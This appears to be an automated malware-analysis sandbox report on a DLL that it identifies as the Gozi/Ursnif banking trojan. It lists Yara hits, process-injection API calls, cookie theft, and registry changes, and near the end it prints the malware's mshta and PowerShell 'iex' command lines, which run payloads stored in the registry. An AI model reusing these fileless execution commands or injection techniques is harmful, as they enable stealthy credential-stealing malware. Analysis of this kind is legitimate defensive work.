Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	0_2_028231EC
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_028231EC

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\System32\loaddll32.exe

Memory allocated: 73CA0000 page execute and read and write

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA1CEF GetProcAddress,NtCreateSection,memset,	0_2_73CA1CEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA1880 NtMapViewOfSection,	0_2_73CA1880
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA15AB GetLastError,NtClose,	0_2_73CA15AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA24C5 NtQueryVirtualMemory,	0_2_73CA24C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282620F GetProcAddress,NtCreateSection,memset,	0_2_0282620F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02823A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02823A77
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_0282A3DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02831813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02831813
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02816825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_02816825
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_0281B868
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282865A NtQueryInformationProcess,	0_2_0282865A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_0281976D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0283345F NtMapViewOfSection,	0_2_0283345F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02811D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	0_2_02811D18
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_0281C536
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02832557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_02832557
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02835A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_02835A8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282AAB7 NtGetContextThread,RtlNtStatusToDosError,	0_2_0282AAB7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02820084 memset,NtQueryInformationProcess,	0_2_02820084
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02816F11 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_02816F11
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02814C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_02814C96
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02818DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_02818DAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02827511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_02827511
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02812D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_02812D26
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E3830 NtWriteVirtualMemory,	26_2_001E3830
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E387C NtCreateSection,	26_2_001E387C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DBAB4 NtAllocateVirtualMemory,	26_2_001DBAB4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1AC4 NtQueryInformationProcess,	26_2_001E1AC4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DCCA0 NtReadVirtualMemory,	26_2_001DCCA0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	26_2_001EF560
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FADD4 NtQueryInformationProcess,	26_2_001FADD4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	26_2_001F676C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EFFCC NtMapViewOfSection,	26_2_001EFFCC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	26_2_001FF7EC
Source: C:\Windows\System32\control.exe	Code function: 26_2_00211004 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_00211004
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5BAB4 NtAllocateVirtualMemory,	29_2_03B5BAB4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61AC4 NtQueryInformationProcess,	29_2_03B61AC4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B63830 NtWriteVirtualMemory,	29_2_03B63830
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6387C NtCreateSection,	29_2_03B6387C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	29_2_03B7F7EC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6FFCC NtMapViewOfSection,	29_2_03B6FFCC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7676C NtSetContextThread,NtUnmapViewOfSection,NtClose,	29_2_03B7676C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6AD14 NtQuerySystemInformation,	29_2_03B6AD14
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	29_2_03B6F560
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5CCA0 NtReadVirtualMemory,	29_2_03B5CCA0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory,	29_2_03B91004

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02812F65 CreateProcessAsUserW,

0_2_02812F65

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA22A4	0_2_73CA22A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_028262B9	0_2_028262B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281A235	0_2_0281A235
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282F9C9	0_2_0282F9C9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_028191D8	0_2_028191D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281DE6E	0_2_0281DE6E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836F28	0_2_02836F28
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02829F48	0_2_02829F48
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02821481	0_2_02821481
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02817CF0	0_2_02817CF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282BDD5	0_2_0282BDD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282C53B	0_2_0282C53B
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FC164	26_2_001FC164
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FA4BC	26_2_001FA4BC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F676C	26_2_001F676C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D203C	26_2_001D203C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F0034	26_2_001F0034
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EB040	26_2_001EB040
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F6064	26_2_001F6064
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FE080	26_2_001FE080
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F20F8	26_2_001F20F8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9138	26_2_001E9138
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DC134	26_2_001DC134
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FF940	26_2_001FF940
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1174	26_2_001E1174
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F91A0	26_2_001F91A0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F3208	26_2_001F3208
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F8224	26_2_001F8224
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D7320	26_2_001D7320
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D8B5C	26_2_001D8B5C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E8B4C	26_2_001E8B4C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9380	26_2_001E9380
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D2BC8	26_2_001D2BC8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DD460	26_2_001DD460
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F94B8	26_2_001F94B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9CB0	26_2_001E9CB0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001ED4A8	26_2_001ED4A8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F74CC	26_2_001F74CC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E0CC0	26_2_001E0CC0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DBCF8	26_2_001DBCF8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E3CE0	26_2_001E3CE0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FB516	26_2_001FB516
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D6D08	26_2_001D6D08
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E452C	26_2_001E452C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EB520	26_2_001EB520
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1D94	26_2_001E1D94
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DAE04	26_2_001DAE04
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F26B4	26_2_001F26B4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FBEB0	26_2_001FBEB0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DB75C	26_2_001DB75C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EF770	26_2_001EF770
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D9F98	26_2_001D9F98
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D37B8	26_2_001D37B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E17B8	26_2_001E17B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FAFB8	26_2_001FAFB8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5C134	29_2_03B5C134
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69138	29_2_03B69138
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7C164	29_2_03B7C164
Source: C:\Windows\explorer.exe	Code function: 29_2_03B70034	29_2_03B70034
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8	29_2_03B537B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7AFB8	29_2_03B7AFB8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6F770	29_2_03B6F770
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7676C	29_2_03B7676C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5B75C	29_2_03B5B75C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61D94	29_2_03B61D94
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7A4BC	29_2_03B7A4BC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69380	29_2_03B69380
Source: C:\Windows\explorer.exe	Code function: 29_2_03B52BC8	29_2_03B52BC8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B57320	29_2_03B57320
Source: C:\Windows\explorer.exe	Code function: 29_2_03B58B5C	29_2_03B58B5C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B68B4C	29_2_03B68B4C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B78224	29_2_03B78224
Source: C:\Windows\explorer.exe	Code function: 29_2_03B73208	29_2_03B73208
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61174	29_2_03B61174
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7F940	29_2_03B7F940
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7E080	29_2_03B7E080
Source: C:\Windows\explorer.exe	Code function: 29_2_03B720F8	29_2_03B720F8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5203C	29_2_03B5203C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B76064	29_2_03B76064
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6B040	29_2_03B6B040
Source: C:\Windows\explorer.exe	Code function: 29_2_03B617B8	29_2_03B617B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B59F98	29_2_03B59F98
Source: C:\Windows\explorer.exe	Code function: 29_2_03B726B4	29_2_03B726B4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7BEB0	29_2_03B7BEB0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5AE04	29_2_03B5AE04
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6B520	29_2_03B6B520
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6452C	29_2_03B6452C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7B516	29_2_03B7B516
Source: C:\Windows\explorer.exe	Code function: 29_2_03B56D08	29_2_03B56D08
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69CB0	29_2_03B69CB0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B794B8	29_2_03B794B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6D4A8	29_2_03B6D4A8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5BCF8	29_2_03B5BCF8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B63CE0	29_2_03B63CE0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B60CC0	29_2_03B60CC0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B774CC	29_2_03B774CC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B55474	29_2_03B55474
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5D460	29_2_03B5D460

PE file does not import any functions

Source: 3he3buld.dll.25.dr	Static PE information: No import functions for PE file found
Source: l4vfe2li.dll.22.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\System32\loaddll32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe	Section loaded: msoert2.dll

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@32/37@11/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02813861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

0_2_02813861

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E7B188DA-2B5F-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{52C0E7AB-8963-5497-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C2534899-3980-442C-D316-7DB8B7AA016C}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CAC73C9B-A194-8CA5-7B9E-6580DFB269B4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA6B98D9B8879D55E.TMP

Jump to behavior

Source: earmarkavchd.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: earmarkavchd.dll

ReversingLabs: Detection: 45%

Source: loaddll32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
